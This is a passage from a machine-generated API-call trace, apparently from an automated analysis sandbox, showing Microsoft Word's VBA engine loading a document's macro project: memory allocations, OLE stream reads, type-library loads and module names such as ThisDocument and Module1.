pptlib=0x1259cc*=0x2876bc0) returned 0x0 [0022.857] wcscpy_s (in: _Destination=0x2876320, _SizeInWords=0x104, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0022.860] CRetailMalloc_Free () returned 0x5f00001 [0022.860] IUnknown:AddRef (This=0x2876bc0) returned 0x2 [0022.860] IUnknown:QueryInterface (in: This=0x2876bc0, riid=0x720f6d54*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1259e0 | out: ppvObject=0x1259e0*=0x0) returned 0x80004002 [0022.863] CRetailMalloc_Alloc () returned 0x573e808 [0022.863] CRetailMalloc_Free () returned 0x360001 [0022.863] CRetailMalloc_Alloc () returned 0x55d8c60 [0022.863] CRetailMalloc_Free () returned 0x25d0001 [0022.864] CRetailMalloc_Alloc () returned 0x5675b00 [0022.864] CRetailMalloc_Alloc () returned 0x28092d0 [0022.864] CRetailMalloc_Alloc () returned 0x56689c0 [0022.865] CRetailMalloc_Alloc () returned 0x54bf798 [0022.865] CRetailMalloc_Alloc () returned 0x581a420 [0022.865] CRetailMalloc_Alloc () returned 0x56a9518 [0022.865] CRetailMalloc_Free () returned 0xffff0001 [0022.865] CRetailMalloc_Alloc () returned 0x55d8c60 [0022.865] CRetailMalloc_Free () returned 0xe80001 [0022.865] CRetailMalloc_Alloc () returned 0x56a89f0 [0022.865] CRetailMalloc_Alloc () returned 0x55d8c60 [0022.865] CRetailMalloc_Alloc () returned 0x786b518 [0022.865] CRetailMalloc_Alloc () returned 0x5727eb0 [0022.865] CRetailMalloc_Alloc () returned 0x78b1cd0 [0022.865] CRetailMalloc_Alloc () returned 0x78b1cc0 [0022.865] CRetailMalloc_Alloc () returned 0x7798378 [0022.865] CRetailMalloc_Alloc () returned 0x5727fc0 [0022.865] CRetailMalloc_Alloc () returned 0x786c060 [0022.865] CRetailMalloc_Alloc () returned 0x55d8c38 [0022.865] CRetailMalloc_Alloc () returned 0x78b1cf0 [0022.865] CRetailMalloc_Alloc () returned 0x78b1d20 [0022.865] CRetailMalloc_Alloc () returned 0x55d8c10 [0022.865] CRetailMalloc_Alloc () returned 0x5728048 [0022.865] CRetailMalloc_Alloc () returned 0x7798998 [0022.866] CRetailMalloc_Alloc () returned 0x7798da0 [0022.866] CRetailMalloc_Alloc () returned 0x77991a8 [0022.866] CExposedDocFile::AddRef () returned 0x3 [0022.866] CExposedDocFile::OpenStream () returned 0x0 [0022.866] CExposedDocFile::Release () returned 0x3 [0022.866] CExposedStream::Seek () returned 0x0 [0022.866] CExposedStream::AddRef () returned 0x2 [0022.866] CExposedStream::Read () returned 0x0 [0022.866] CRetailMalloc_Alloc () returned 0x5810678 [0022.866] CRetailMalloc_Alloc () returned 0x578ccf8 [0022.867] CExposedStream::AddRef () returned 0x3 [0022.867] CExposedStream::Release () returned 0x2 [0022.867] CRetailMalloc_Alloc () returned 0x5794d10 [0022.867] CRetailMalloc_Alloc () returned 0x52ee9a8 [0022.867] CExposedStream::Read () returned 0x0 [0022.867] CExposedStream::Read () returned 0x0 [0022.867] CRetailMalloc_Alloc () returned 0x7877f80 [0022.890] CRetailMalloc_Alloc () returned 0x786b530 [0022.890] CRetailMalloc_Alloc () returned 0x55d8be8 [0022.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x786b530, cbMultiByte=13, lpWideCharStr=0x55d8be8, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0022.890] CRetailMalloc_Free () returned 0xe9c0001 [0022.890] CRetailMalloc_Free () returned 0x4fd0101 [0022.890] CRetailMalloc_Alloc () returned 0x78b26d0 [0022.890] CRetailMalloc_Alloc () returned 0x579cd78 [0022.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x78b26d0, cbMultiByte=21, lpWideCharStr=0x579cd78, cchWideChar=21 | out: lpWideCharStr="1Normal.ThisDocument") returned 21 [0022.890] CRetailMalloc_Alloc () returned 0x579cdb0 [0022.891] CRetailMalloc_Free () returned 0x2ca0201 [0022.891] CRetailMalloc_Free () returned 0x5ab0001 [0022.892] CExposedStream::Read () returned 0x0 [0022.892] CExposedStream::Release () returned 0x1 [0022.892] CExposedStream::Release () returned 0x0 [0022.894] CRetailMalloc_Alloc () returned 0x5675bb0 [0022.894] CRetailMalloc_Alloc () returned 0x2809258 [0022.894] CRetailMalloc_Alloc () returned 0x5668950 [0022.894] CRetailMalloc_Alloc () returned 0x523cda8 [0022.894] CRetailMalloc_Free () returned 0x1020001 [0022.894] CRetailMalloc_Alloc () returned 0x55d8be8 [0022.894] CRetailMalloc_Free () returned 0x12e0001 [0022.894] CRetailMalloc_Alloc () returned 0x7878390 [0022.894] CRetailMalloc_Alloc () returned 0x55d8be8 [0022.894] CRetailMalloc_Alloc () returned 0x786b560 [0022.894] CRetailMalloc_Alloc () returned 0x5728158 [0022.894] CRetailMalloc_Alloc () returned 0x78b1ce0 [0022.894] CRetailMalloc_Alloc () returned 0x78b1d10 [0022.895] CExposedDocFile::AddRef () returned 0x4 [0022.895] CExposedDocFile::OpenStream () returned 0x0 [0022.895] CExposedDocFile::Release () returned 0x4 [0022.895] CExposedStream::Seek () returned 0x0 [0022.895] CRetailMalloc_Alloc () returned 0x7878600 [0022.895] CRetailMalloc_Alloc () returned 0x57281e0 [0022.895] CRetailMalloc_Alloc () returned 0x7878c20 [0022.895] CRetailMalloc_Alloc () returned 0x55d8bc0 [0022.895] CRetailMalloc_Alloc () returned 0x78b1cd0 [0022.895] CRetailMalloc_Alloc () returned 0x78b1d30 [0022.895] CRetailMalloc_Alloc () returned 0x55d8b98 [0022.895] CRetailMalloc_Alloc () returned 0x5728268 [0022.895] CExposedStream::AddRef () returned 0x2 [0022.895] CExposedStream::Read () returned 0x0 [0022.895] CExposedStream::AddRef () returned 0x3 [0022.895] CExposedStream::Release () returned 0x2 [0022.895] CRetailMalloc_Alloc () returned 0x5794f70 [0022.895] CExposedStream::Read () returned 0x0 [0022.895] CExposedStream::Read () returned 0x0 [0022.895] CRetailMalloc_Alloc () returned 0x78b1d40 [0022.895] CRetailMalloc_Alloc () returned 0x786b578 [0022.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x78b1d40, cbMultiByte=8, lpWideCharStr=0x786b578, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0022.895] CRetailMalloc_Free () returned 0x36a0001 [0022.895] CRetailMalloc_Free () returned 0xea50001 [0022.899] strcpy_s (in: _Dst=0x7230f130, _DstSize=0x100, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0022.900] atoi (_Str="0") returned 0 [0022.901] CExposedStream::Read () returned 0x0 [0022.901] CExposedStream::Read () returned 0x0 [0022.901] CExposedStream::Read () returned 0x0 [0022.901] CExposedStream::Release () returned 0x1 [0022.901] CExposedStream::Release () returned 0x0 [0022.901] CExposedStream::Release () returned 0x0 [0022.902] CRetailMalloc_Free () returned 0x1 [0022.902] CRetailMalloc_Free () returned 0x1 [0022.902] CRetailMalloc_Free () returned 0x1 [0022.902] CRetailMalloc_Free () returned 0x1 [0022.902] CExposedStream::Seek () returned 0x80030102 [0022.902] CRetailMalloc_Free () returned 0x1 [0022.902] lstrcpyA (in: lpString1=0x38a1af0, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0022.902] CExposedDocFile::Stat () returned 0x0 [0022.902] CExposedDocFile::OpenStream () returned 0x0 [0022.902] CExposedDocFile::AddRef () returned 0x3 [0022.902] CExposedStream::Stat () returned 0x0 [0022.902] CExposedStream::Read () returned 0x0 [0022.902] lstrlenA (lpString="") returned 0 [0022.902] lstrcpyA (in: lpString1=0x3fe228, lpString2="" | out: lpString1="") returned="" [0022.902] lstrlenA (lpString="") returned 0 [0022.902] lstrcpyA (in: lpString1=0x3fe248, lpString2="" | out: lpString1="") returned="" [0022.903] CExposedDocFile::OpenStream () returned 0x0 [0022.904] CExposedStream::Stat () returned 0x0 [0022.904] CExposedStream::Read () returned 0x0 [0022.904] CExposedStream::Release () returned 0x0 [0022.904] lstrcpyA (in: lpString1=0x3fe238, lpString2="" | out: lpString1="") returned="" [0022.904] lstrcpyA (in: lpString1=0x3fe258, lpString2="" | out: lpString1="") returned="" [0022.905] CExposedStream::Commit () returned 0x0 [0022.905] CExposedStream::Release () returned 0x0 [0022.907] CRetailMalloc_Alloc () returned 0x55d8a80 [0022.907] SendMessageA (hWnd=0x101e8, Msg=0x84, wParam=0x0, lParam=0x27301a5) returned 0x1 [0022.908] SendMessageA (hWnd=0x101e8, Msg=0x20, wParam=0x101e8, lParam=0x2000001) returned 0x1 [0022.919] CExposedDocFile::CreateStorage () returned 0x0 [0022.919] CRetailMalloc_Alloc () returned 0x7879038 [0022.919] CRetailMalloc_Alloc () returned 0x5795278 [0022.921] CRetailMalloc_Alloc () returned 0x5675b58 [0022.921] CRetailMalloc_Alloc () returned 0x2a1e20 [0022.921] CRetailMalloc_Alloc () returned 0x5795f80 [0022.921] CRetailMalloc_Alloc () returned 0x2876de8 [0022.921] CRetailMalloc_Alloc () returned 0x2876998 [0022.921] CRetailMalloc_Alloc () returned 0x2877010 [0022.921] CRetailMalloc_Alloc () returned 0x55d8af8 [0022.921] CRetailMalloc_Alloc () returned 0x786b590 [0022.921] CRetailMalloc_Alloc () returned 0x57281e0 [0022.921] CRetailMalloc_Alloc () returned 0x78b1d40 [0022.921] CRetailMalloc_Alloc () returned 0x57282f0 [0022.921] CRetailMalloc_Alloc () returned 0x55d8990 [0022.921] CRetailMalloc_Alloc () returned 0x5728378 [0022.921] CRetailMalloc_Alloc () returned 0x78b1d50 [0022.921] CRetailMalloc_Alloc () returned 0x78b1d60 [0022.921] CRetailMalloc_Alloc () returned 0x57998a0 [0022.921] CRetailMalloc_Free () returned 0x1 [0022.929] SysStringLen (param_1="Word") returned 0x4 [0022.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0022.929] SysStringLen (param_1="Word") returned 0x4 [0022.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x55d8d04, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0022.929] CRetailMalloc_Alloc () returned 0x58092c8 [0022.929] CRetailMalloc_Free () returned 0x4c0001 [0022.930] SysStringLen (param_1="VBA") returned 0x3 [0022.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0022.930] SysStringLen (param_1="VBA") returned 0x3 [0022.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x55d8dcc, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0022.930] CRetailMalloc_Alloc () returned 0x786b5a8 [0022.930] CRetailMalloc_Free () returned 0x4ad0101 [0022.930] CRetailMalloc_Alloc () returned 0x55d8990 [0022.930] CRetailMalloc_Free () returned 0xeab0001 [0022.930] CRetailMalloc_Alloc () returned 0x534e740 [0022.930] CRetailMalloc_Free () returned 0xffff0001 [0022.931] CRetailMalloc_Alloc () returned 0x78b1d70 [0022.931] CRetailMalloc_Alloc () returned 0x78b1d80 [0022.931] CRetailMalloc_Alloc () returned 0x78b1d90 [0022.931] CRetailMalloc_Free () returned 0x3740001 [0022.931] CRetailMalloc_Alloc () returned 0x78b3890 [0022.931] CRetailMalloc_Alloc () returned 0x786b5a8 [0022.931] CRetailMalloc_Free () returned 0x3720001 [0022.931] CRetailMalloc_Free () returned 0x3700001 [0022.931] wcsncmp (_String1="*\\Z", _String2="*\\Z", _MaxCount=0x3) returned 0 [0022.931] CRetailMalloc_Alloc () returned 0x5799bd8 [0022.931] LoadStringA (in: hInstance=0x720a0000, uID=0x32f3, lpBuffer=0x38a2914, cchBufferMax=128 | out: lpBuffer="Project") returned 0x7 [0022.941] wsprintfA (in: param_1=0x38a291b, param_2="%d" | out: param_1="1") returned 1 [0022.942] CRetailMalloc_Alloc () returned 0x78b2850 [0022.942] CRetailMalloc_Free () returned 0x4a80101 [0022.942] CRetailMalloc_Alloc () returned 0x55d8990 [0022.942] CRetailMalloc_Free () returned 0xe20201 [0022.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb", cchWideChar=-1, lpMultiByteStr=0x126180, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlb", lpUsedDefaultChar=0x0) returned 32 [0022.944] lstrlenA (lpString="C:\\Windows\\system32\\stdole2.tlb") returned 31 [0022.944] lstrcpyA (in: lpString1=0x38a3260, lpString2="C:\\Windows\\system32\\stdole2.tlb" | out: lpString1="C:\\Windows\\system32\\stdole2.tlb") returned="C:\\Windows\\system32\\stdole2.tlb" [0022.944] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x12651c*=0x0 | out: pptlib=0x12651c*=0x2876770) returned 0x0 [0022.944] IUnknown:QueryInterface (in: This=0x2876770, riid=0x720eb970*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1261e8 | out: ppvObject=0x1261e8*=0x0) returned 0x80004002 [0022.945] SysStringLen (param_1="stdole") returned 0x6 [0022.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0022.945] SysStringLen (param_1="stdole") returned 0x6 [0022.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x55d8d04, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0022.945] CRetailMalloc_Alloc () returned 0x58198e0 [0022.945] CRetailMalloc_Free () returned 0xde0001 [0022.945] CRetailMalloc_Alloc () returned 0x55d8990 [0022.945] CRetailMalloc_Free () returned 0x20c0001 [0022.945] CRetailMalloc_Alloc () returned 0x5729de0 [0022.945] CRetailMalloc_Free () returned 0x340001 [0022.945] CRetailMalloc_Alloc () returned 0x5729de0 [0022.945] CRetailMalloc_Free () returned 0x340001 [0022.946] IUnknown:Release (This=0x2876770) returned 0x4 [0022.946] GetModuleFileNameA (in: hModule=0x720d0000, lpFilename=0x126414, nSize=0x104 | out: lpFilename="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\progra~1\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll")) returned 0x31 [0022.946] strcat_s (in: _Destination="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL", _SizeInBytes=0x104, _Source="\\3" | out: _Destination="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 0x0 [0022.948] LoadTypeLib (in: szFile="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL\\3", pptlib=0x126410 | out: pptlib=0x126410*=0x2877688) returned 0x0 [0022.950] ITypeLib:GetTypeInfoOfGuid (in: This=0x2877688, GUID=0x721cbc44, ppTInfo=0x126540 | out: ppTInfo=0x126540*=0x777c04c) returned 0x0 [0022.950] ITypeInfo:RemoteGetTypeAttr (in: This=0x777c04c, ppTypeAttr=0x1264f4, pDummy=0x38a2794 | out: ppTypeAttr=0x1264f4, pDummy=0x38a2794*=0x720d23b4) returned 0x0 [0022.950] ITypeInfo:LocalReleaseTypeAttr (This=0x777c04c) returned 0x5725de8 [0022.950] ITypeInfo:RemoteGetTypeAttr (in: This=0x777c04c, ppTypeAttr=0x1264cc, pDummy=0x1 | out: ppTypeAttr=0x1264cc, pDummy=0x1) returned 0x0 [0022.950] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x1263ac | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\") returned 0x25 [0022.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x126380, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0022.951] lstrlenA (lpString="VBE") returned 3 [0022.951] lstrlenA (lpString="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\") returned 37 [0022.951] _msize (_Block=0x38a32a8) returned 0x26 [0022.951] lstrlenA (lpString="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\") returned 37 [0022.951] lstrlenA (lpString="VBE") returned 3 [0022.951] _msize (_Block=0x38a32d8) returned 0x26 [0022.951] lstrlenA (lpString="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\") returned 37 [0022.951] lstrlenA (lpString="VBE") returned 3 [0022.951] lstrcatA (in: lpString1="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\", lpString2="VBE" | out: lpString1="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE") returned="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE" [0022.951] strcpy_s (in: _Dst=0x38a3340, _DstSize=0x29, _Src="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0022.951] _access_s (_FileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x0 [0022.952] strcpy_s (in: _Dst=0x38a3340, _DstSize=0x29, _Src="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0022.952] _access_s (_FileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE", _AccessMode=2) returned 0x0 [0022.952] strcpy_s (in: _Dst=0x38a3340, _DstSize=0x29, _Src="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0022.952] strcpy_s (in: _Dst=0x38a3340, _DstSize=0x29, _Src="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0022.952] strcpy_s (in: _Dst=0x38a3340, _DstSize=0x29, _Src="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE") returned 0x0 [0022.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE", cchWideChar=-1, lpMultiByteStr=0x126460, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE", lpUsedDefaultChar=0x0) returned 41 [0022.953] _access_s (_FileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x0 [0022.953] IUnknown:AddRef (This=0x777c04c) returned 0x2 [0022.953] ITypeInfo:LocalReleaseTypeAttr (This=0x777c04c) returned 0x5725de8 [0022.953] StringFromCLSID (in: rclsid=0x38a3278*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a)), lplpsz=0x12649c | out: lplpsz=0x12649c*="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 0x0 [0022.953] CRetailMalloc_Alloc () returned 0x58198e0 [0022.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", cchWideChar=-1, lpMultiByteStr=0x58198e0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", lpUsedDefaultChar=0x0) returned 39 [0022.953] CRetailMalloc_Free () returned 0xf850001 [0022.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x1264a0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0022.953] lstrlenA (lpString="VBE") returned 3 [0022.953] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 38 [0022.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x126490, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0022.953] wsprintfA (in: param_1=0x38a32a8, param_2="%s;%s;&H%08lX" | out: param_1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0022.953] wsprintfA (in: param_1=0x1264cc, param_2="&H%08lX" | out: param_1="&H00000001") returned 10 [0022.954] CRetailMalloc_Free () returned 0x20c0001 [0022.954] CRetailMalloc_Alloc () returned 0x55d88f0 [0022.954] SendMessageA (hWnd=0x101e8, Msg=0x84, wParam=0x0, lParam=0x27301a5) returned 0x1 [0022.954] SendMessageA (hWnd=0x101e8, Msg=0x20, wParam=0x101e8, lParam=0x2000001) returned 0x1 [0022.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x126530, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0022.955] IsCharAlphaA (ch=78) returned 1 [0022.955] lstrlenA (lpString="Normal") returned 6 [0022.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x126318, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0022.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x1263b0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0022.956] lstrcmpA (lpString1="Project1", lpString2="Normal") returned 1 [0022.956] CRetailMalloc_Alloc () returned 0x579cde8 [0022.956] CRetailMalloc_Free () returned 0xf7a0001 [0022.956] CRetailMalloc_Alloc () returned 0x55d88c8 [0022.956] CRetailMalloc_Free () returned 0x5b20001 [0022.960] wcscpy_s (in: _Destination=0x125ff2, _SizeInWords=0x105, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0022.960] _wcsicmp (_String1="*\\CNormal", _String2="*\\Z035bb2f63c") returned -23 [0022.962] wcscpy_s (in: _Destination=0x7877328, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0022.962] wcscpy_s (in: _Destination=0x7879048, _SizeInWords=0x108, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0022.964] ITypeInfo:RemoteGetDocumentation (in: This=0x569ef84, memid=-1, refPtrFlags=0x126524, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x38a32dc | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x38a32dc*="䇴爤Ꞥ爎꾓爏䉜爤䊬爤뗛爐䌭爤䏁爤䑖爤䎮爜䝠爤䤀爤䤛爤䆹爜䬅爤") returned 0x0 [0022.964] IUnknown:Release (This=0x569ef84) returned 0x0 [0022.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=-1, lpMultiByteStr=0x1264f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0022.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=-1, lpMultiByteStr=0x1264d0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0022.964] IsCharAlphaA (ch=84) returned 1 [0022.964] lstrlenA (lpString="ThisDocument") returned 12 [0022.965] ITypeInfo:RemoteGetTypeAttr (in: This=0x569ef58, ppTypeAttr=0x126418, pDummy=0x0 | out: ppTypeAttr=0x126418, pDummy=0x0) returned 0x0 [0022.965] ITypeInfo:LocalReleaseTypeAttr (This=0x569ef58) returned 0x5725de8 [0022.965] CRetailMalloc_Alloc () returned 0x5675c60 [0022.965] CRetailMalloc_Alloc () returned 0x5810690 [0022.965] CRetailMalloc_Alloc () returned 0x5795ff0 [0022.965] CRetailMalloc_Alloc () returned 0x54bf868 [0022.965] CRetailMalloc_Alloc () returned 0x58198e0 [0022.966] CRetailMalloc_Alloc () returned 0x579cde8 [0022.966] CRetailMalloc_Free () returned 0xf900001 [0022.966] CRetailMalloc_Alloc () returned 0x55d88a0 [0022.966] CRetailMalloc_Free () returned 0x5b20001 [0022.966] CRetailMalloc_Alloc () returned 0x57998a0 [0022.966] CRetailMalloc_Alloc () returned 0x55d88a0 [0022.966] CRetailMalloc_Alloc () returned 0x786b5c0 [0022.966] CRetailMalloc_Alloc () returned 0x57282f0 [0022.966] CRetailMalloc_Alloc () returned 0x78b1d50 [0022.966] CRetailMalloc_Alloc () returned 0x78b1d40 [0022.966] CRetailMalloc_Alloc () returned 0x5811678 [0022.966] CRetailMalloc_Alloc () returned 0x5728378 [0022.966] CRetailMalloc_Alloc () returned 0x5811c98 [0022.966] CRetailMalloc_Alloc () returned 0x55d8878 [0022.966] CRetailMalloc_Alloc () returned 0x78b1d70 [0022.966] CRetailMalloc_Alloc () returned 0x78b1d90 [0022.966] CRetailMalloc_Alloc () returned 0x55d8850 [0022.966] CRetailMalloc_Alloc () returned 0x5728400 [0022.967] CRetailMalloc_Alloc () returned 0x78b2910 [0022.967] CRetailMalloc_Alloc () returned 0x78b8210 [0022.968] IUnknown:Release (This=0x569ef84) returned 0x1 [0022.968] CRetailMalloc_Alloc () returned 0x58120b0 [0022.968] CRetailMalloc_Free () returned 0x1 [0022.970] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL", pptlib=0x126600*=0x0 | out: pptlib=0x126600*=0x2876bc0) returned 0x0 [0022.970] IUnknown:QueryInterface (in: This=0x2876bc0, riid=0x720eb970*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1262cc | out: ppvObject=0x1262cc*=0x0) returned 0x80004002 [0022.971] SysStringLen (param_1="Office") returned 0x6 [0022.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0022.971] SysStringLen (param_1="Office") returned 0x6 [0022.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x27e77fc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0022.971] CRetailMalloc_Alloc () returned 0x573e8e0 [0022.971] 